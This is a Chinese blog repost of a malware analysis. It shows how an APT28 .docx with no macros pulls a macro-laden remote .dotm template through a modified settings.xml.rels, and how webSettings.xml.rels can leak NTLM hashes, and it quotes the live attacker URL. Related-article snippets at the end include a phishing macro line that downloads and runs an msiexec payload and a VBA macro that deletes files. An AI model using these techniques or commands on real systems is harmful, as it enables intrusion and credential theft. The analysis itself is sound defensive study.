宏病毒的研究与实例分析05——无宏文件携带宏病毒

最新推荐文章于 2023-10-09 15:52:41 发布
最新推荐文章于 2023-10-09 15:52:41 发布
阅读量1.6k 收藏 8
点赞数 2
分类专栏: 病毒分析 文章标签: 宏病毒
原文链接:https://bbs.ichunqiu.com/thread-42469-1-1.html
版权

文章目录

前言

docx文件可能是宏病毒吗?

如果你是一周前问笔者这个问题,笔者一定会斩钉截铁的说:”不可能!” 。笔者在之前的文章中提到过,docx中是不含宏的,所以不可能是宏病毒。但是,现在笔者却会斩钉截铁的说:”即使没有宏也可能是宏病毒!”。

故事要从很久很久以前说起,office文档诞生后不久,就迅速占领各大平台,成为使用最广泛的文档文件。office文档能够迅速占领各大平台市场,离不开其丰富多样的内容。为了组装其丰富多彩的内容,微软最初使用的是OLE文件格式,OLE文件数据管理方式类似磁盘管理,该方式能够有效组装各个零件,但是却不够灵活。在office2007中,微软推出了OpenXML文件格式,该文件格式其实是标准的压缩文件格式,通过XML组装各个零件。OpenXML文件格式足够灵活,同时也“解决”了office文档最大的安全问题——宏病毒威胁,微软将所有宏相关的内容都放进了vbaProject.bin文件中,只要文件中不包含vbaProject.bin,就不可能含有宏,也就不可能是宏病毒。于是,微软推出了以x结尾(docx)和以m结尾(docm)的两大类文档文件,这两类文件均是OpenXML文件,但是以x结尾的文件中不含有vbaProject.bin。

正所谓“道高一尺魔高一丈”,没有vbaProject.bin,攻击者们就不能使用宏病毒进行攻击了吗?

远程模板注入执行宏

既然本地文件中没有宏,攻击者便尝试执行远程文件中宏。来自APT28的最新样本将此技术展现的淋漓尽致。

该样本是docx文件,文件内没有任何宏相关信息,但是打开该文件后,却会弹出经典的“宏安全告警”:

这个宏是哪里来的?

在这里插入图片描述

为了追踪这个宏的来源,我们开启行为监控软件,再次打开这个docx文件。这个时候就会发现,该docx文件打开了一个远程站点上的dotm文件:

img

以m结尾的文档文件是可能携带宏的。

查看宏代码,dotm文件中的宏和docx中的宏代码完全相同,可以确定docx文件中的宏就是来自于这个dotm文件。

继续追踪,docx文件为什么会打开这样远程dotm文件?

解压docx文件,遍历所有文件,搜索字符串"http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm”,我们可以在./word/rels/settings.xml.rels中找到这段字符串:

在这里插入图片描述

远程链接的位置也找到了,但是新的问题又出现了,这段字符串在docx中是如何起作用的?接下来我们就需要分析docx文件的文件格式了。

docx文件格式解析

将docx文件后缀名修改为zip,解压该文件,我们发现其文件结构如下:

img

其结构解释如下:

img

此内容摘自于l1xnan,虽然没有提到settings.xml.rel,但我们可以根据document.xml.rels猜测settings.xml.rels也是用于定位文档各零件的。在rels文件Relationship标签中,Target表示零件的文件位置,正常情况下,给值是相对路径,且存在于压缩包中:

img

通过恶意构造Target,使其执行远程文件,就可以打开远程文件:

img

APT28就是利用这种方式打开远程含有宏病毒的文档模板

窃取NTLM Hashes

此攻击技术最早由pentestlab提出,与前文不同的是,此技术中修改的是webSetings.xml.rels文件,且只有在Office2010及之后版本才能利用成功。详细的操作步骤请看pentestlab的分析文章,笔者就不赘述了,实验效果如下:

img

此攻击技术能获取NTLM Hashes的原因是,经过恶意构造的docx打开时会访问远程资源,访问远程资源使用NTLM协议进行身份验证,从而泄露NTLM Hashes信息。

小结

与传统的病毒文档相比,这个攻击文档本身不含有恶意代码,任何静态扫描程序都无法发现宏本身,邮件拦截系统也很难发现存在其中的威胁,可以预见此类宏病毒威胁将会越来越多。而随着此类攻击技术的发展,除了settings.xml.rels、webSettings.xml.rels,其他rels也可能成为被攻击的目标。

参考资料:
https://mp.weixin.qq.com/s/zoaJAoUtjRtJzT6UkQuN5w
http://blog.redxorblue.com/2018/07/executing-macros-from-docx-with-remote.html
http://www.4hou.com/technology/9403.html

说明

  • 本文并非原创,乃是征得作者同意后的转载 原作者为狐狸先生 未经允许,禁止转载
  • 需要相关文件可以到我的Github下载:https://github.com/TonyChen56/Virus-Analysis
  • 应作者要求 贴上知识星球图片 主要分享病毒分析和逆向破解技术,文章质量很高 我也在这个星球里 大家可以积极加入
鬼手56
关注
专栏目录
计算机文化基础必背知识点
s13596191285的博客
06-24 185
计算机处理数据时,CPU通过数据总线一次存取、加工和传送的数据称为字,计算机的运算部件能同时处理的(这一组)二进制数据的位数称为字长。还包括机器的兼容性(数据和文件的兼容、程序兼容、系统兼容和设备兼容),系统的可靠性(平均无故障工作时间),系统的可维护性(平均修复时间),机器允许配置的外部设备的最大数目,数据库管理系统及网格功能等。对计算机硬件资源的有效控制与管理,提高计算机资源的使用效率,协调计算机各组成部分的工作,并在硬件提供的基本功能的基础上拓展计算机的功能,提高计算机实现和运行各类应用任务的能力。
2022前端笔记
马航机长的博客
06-24 2231
tip:只记录本人记得不牢固的,或者有启发的点,新手建议多看书 1、原型链 实例对象的constructor也会指向构造函数 因为没有constructor属性会通过原型链找(容易忽略,是个小陷阱) function Person() {} var person = new Person(); console.log(person.constructor === Person); // true __proto__ 来自于 Object.prototype,更像是一个 getter/setter,使用 o
文件恶意代码分析
baoyahong的博客
10-16 718
一、分析工具:oledump.py 二、样本:ef02527858797356c5e8571c5a22d00c481fbc9ce73c81a341d482ea3776878a 三、分析步骤 1.查看宏 命令:python3 old_sample/oledump.py ef02527858797356c5e8571c5a22d00c481fbc9ce73c81a341d482ea3776878a 结果出现大写字母“M”的表示宏代码的位置,“8”为索引 2.提取恶意宏代码 命令:python3
office 宏病毒分析
CMC_HHM的博客
03-25 2063
1、样本信息 在网上下载样本,是一个word的宏病毒 名称 713-288-4192.doc MD5 61F1A99292A199F867B168B76FC8CC74 SHA1 967DA912065D014C275463917D236836967B27CA CRC32 A117A12E 2、分析工具准备 在linux平台下安装 安装依赖包 wget...
趋势科技技术分析:详解无文件勒索病毒Sorebrect
weixin_33895695的博客
09-14 203
本文讲的是趋势科技技术分析:详解无文件勒索病毒Sorebrect,Fileless威胁和ransomware并不是什么新的东西,但是包含其特征组合的恶意软件却可能成为一种新的危险。例如,我们最近发现的Fileless代码注入ransomware – SOREBRECT。 事实上,我们是在今年第二季度初的监测中首次遇到SOREBRECT的,它对中东各个组...
病毒分析
a562449131的博客
08-30 2074
病毒分析第一讲,分析病毒注意事项,以及简单分析主要功能 一丶认识木马和病毒的区别 木马和病毒是两个不一样的,有人会把木马认为是病毒,但其实不是 说下区别 木马:   木马没有破坏性,木马主要功能是收集用户信息,控制机器等等. 病毒:   病毒一般带有破坏性的行为,比如格式化盘符,修改电脑的文件,传染.... 二丶分析病毒的前提准备 1.在分析病毒样本之前,首先要把...
宏病毒分析技巧 - 绕过密码保护
u012871930的博客
03-18 417
分析宏病毒样本时,偶尔会遇到带密码的宏病毒样本,有些工具可以直接读取或绕过输入密码 这里使用一种简单粗暴的方法来绕过宏密码保护,使用任意一款16进制编辑器,搜索DPB 将其修改为DPX 保存后,重新打开宏病毒样本,WORD弹出错误提示,点击 是 使用ALT+F11打开宏编辑器,然后打开右键Project属性 在属性窗口->保护 我们可以取消密码保护,或输入一个新密码 这里...
2022第三届全国大学生网络安全精英赛练习题(3)
派大星子的博客
11-21 9689
2022第三届全国大学生网络安全精英赛练习题(3)
红队专题-Cobalt strike从小白到飞升手册
最新发布
aming小老弟
10-09 1354
4.0 2019年12月2日 更新 Cobalt Strike 4.0 手册奇安信 A-TEAMCobalt Strike 是一款 美国Red Team开发的 商业GUI框架式 优秀的渗透测试工具 简称CS为对手模拟渗透测试 和红队行动而设计的 协作工具平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。可以利用网络漏洞获取主机权限后、从一个强大的图形界面控制所有的活动。因可以调用Mimikatz等其他知名工具并且可以作为团队服务使用,因此广受网络安全人员喜爱。
C#微软培训资料
01-22
1.1 Microsoft.NET——一场新的革命.4 1.2 .NET 与 C#.6 1.3 C#语言的特点.8 1.4 小 结 .11 第二章 运行环境 全面了解.NET.12 2.1 .NET 结构.12 2.2 公用语言运行时环境与公用语言规范.13 2.3 开 发 ...
Microsoft Office 文件内含VBA工程数据格式标准.doc
03-07
Microsoft Office 文件内含VBA工程数据格式标准 该文档详细介绍了包含在微软office文档(Word、excel、PPT、access等)中的vbaproject.bin VBA工程文件的数据结构
防病毒技术:无文件攻击
weixin_33804990的博客
01-30 665
如今,无文件攻击已经常态化了。虽然一些攻击和恶意软件家族在其攻击的各个方面都企图实现无文件化,但只有一些功能才能实现无文件化。对于攻击者来说,无文件化只是试图绕过攻击的一种手段,至于是否有文件,都只是表象。 无文件攻击简介 “无文件攻击”这一术语往往会让人产生歧义,比如无文件攻击就代表真的没有攻击文件吗?没有文件又如何实施攻击?如何检测?如何防御……,其实“无文件攻击”只是一种攻击策略,其...
常见的无文件攻击技术解析(不定时更新)——入得此门不回首
sxr__nc的博客
05-18 833
下边介绍的几种无文件的攻击方式都是在病毒分析过程中实际碰到过的技术手段,有解释的不清楚或者有粗无的地方,欢迎一起讨论。 1、通过宏代码的方式来执行恶意操作。之前分析的一个病毒,将代码内嵌到宏代码里边并且设置为自动执行,当用户点击同意启用宏之后(大多通过邮件或者其他社会工程学的方式使用),就会执行宏代码,而宏代码的功能是连接到远程的网站上执行一段恶意的powershell,当然,这段恶意的powershell也是经过混淆的,powershell的功能也是连接到其他网站来执行一段恶意的代码,就这样循环下去,一直
宏病毒组(三)| 数据组装软件使用教程
bioyigene的博客
12-12 1103
测序得到大量的宏基因组/宏病毒组数据后,我们均需要组装后进行物种注释及基因注释。目前主流的组装软件有megahit、metaspades等。其中,MEGAHIT是超快的宏基因组序列组装工具,成为行业的主流组装软件。
宏病毒删除指定文件夹下所有文件
qq_40334963的博客
02-27 617
环境: win10 office 2016 操作 新建macroVirus.docx文件 打开macroVirus.docx文件找到宏 点击“查看宏“,创建新的自定义宏病毒 代码: Sub AutoExec () Kill "C:\Users\16679\Desktop\testFolder\*" E = MsgBox("It is a Macros vir...
Excel宏(VBA)密码破解
热门推荐
zhouzying的博客
04-04 1万+
Excel宏破解,VBA破解,vba密码破解
Excel VBA代码密码破解
u013347671的博客
06-06 9857
2.8:点"开发工具--查看代码":继续弹窗提示,点击确定,知道出现VBAproject界面。2.4:打开.bin文件(这里用的是notepad++,不要用记事本),查找到"DPB"2.7:把文件名后缀重新改回xlsm,打开会弹出提示,点"是"2.9:点击:工具--VBAProject-工程属性--保护,2.2:打开压缩包文件,找到文件:vbaProject.bin。a:这里可以选择去掉"查看时锁定工程"前面的勾,这样就没有密码。2.5:把"DPB"修改为"DPx",注意大小写,保存。点击确定,破解完成。
利用DOCX文档远程模板注入执行宏代码
weixin_44922845的博客
04-03 2663
利用DOCX文档远程模板注入执行宏代码 简介 本地文件中在没有宏代码的情况下,攻击者可以尝试执行远程文件中宏代码。其中来自APT28的最新样本将此技术展现的淋漓尽致。该样本是docx文件文件内没有任何宏相关信息,但是打开该文件后,却会弹出经典的“宏安全警告”。本实验将实现通过远程加载执行宏代码的攻击方式。 应用场景 该种攻击方式与传统的宏启用文档相比,这种攻击的好处是多方面的。在对目标执行网络...
网络安全之内外网渗透-网络钓鱼技巧
weixin_46626737的博客
06-30 255
操作:先使用msf生成一个msi文件,放到云服务器上,然后新建一个excle表,右键点击插入宏表,然后第一格输入=EXEC(“msiexec /q /i http://192.168.10.88/123.msi”),第二格输入=HALT()入cs生成的代码,选择auto open选项,然后保存,弹出的框选择否,然后会出现另存为,选择dotm启用宏的文件,在通过邮件发。利用生成的宏代码,放到word中,记得word一定要开启开发者模式,在开发者模式中选择宏,取名,编辑,在编辑弹出的框中加。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值